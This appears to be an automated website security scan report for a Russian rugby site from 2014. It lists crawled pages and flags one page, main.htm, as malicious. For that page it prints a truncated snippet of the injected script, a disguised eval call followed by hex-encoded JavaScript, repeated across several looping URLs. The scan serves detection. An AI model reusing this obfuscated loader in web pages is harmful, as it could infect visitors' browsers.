Scanned pages/files
Request | Server response | Status |
http://rugbymai.ru/ | 200 OK Content-Length: 41479 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
| ||
http://rugbymai.ru/sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
| ||
http://rugbymai.ru/sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
| ||
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
| ||
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
| ||
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
| ||
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rugbymai.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Apr 2014 16:55:13 GMT
Accept-Ranges: bytes
ETag: "13258ea-a207-487aa0b9ef700"
Server: nginx
Vary: Accept-Encoding
Content-Length: 41479
Content-Type: text/html
Last-Modified: Fri, 28 May 2010 16:31:56 GMT
...41479 bytes of data.
GET / HTTP/1.1
Host: rugbymai.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Apr 2014 16:55:13 GMT
Accept-Ranges: bytes
ETag: "13258ea-a207-487aa0b9ef700"
Server: nginx
Vary: Accept-Encoding
Content-Length: 41479
Content-Type: text/html
Last-Modified: Fri, 28 May 2010 16:31:56 GMT
...41479 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rugbymai.ru
Referer: http://www.google.com/search?q=rugbymai.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rugbymai.ru
Referer: http://www.google.com/search?q=rugbymai.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rugbymai.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rugbymai.ru/
Result: rugbymai.ru is not infected or malware details are not published yet.
Result: rugbymai.ru is not infected or malware details are not published yet.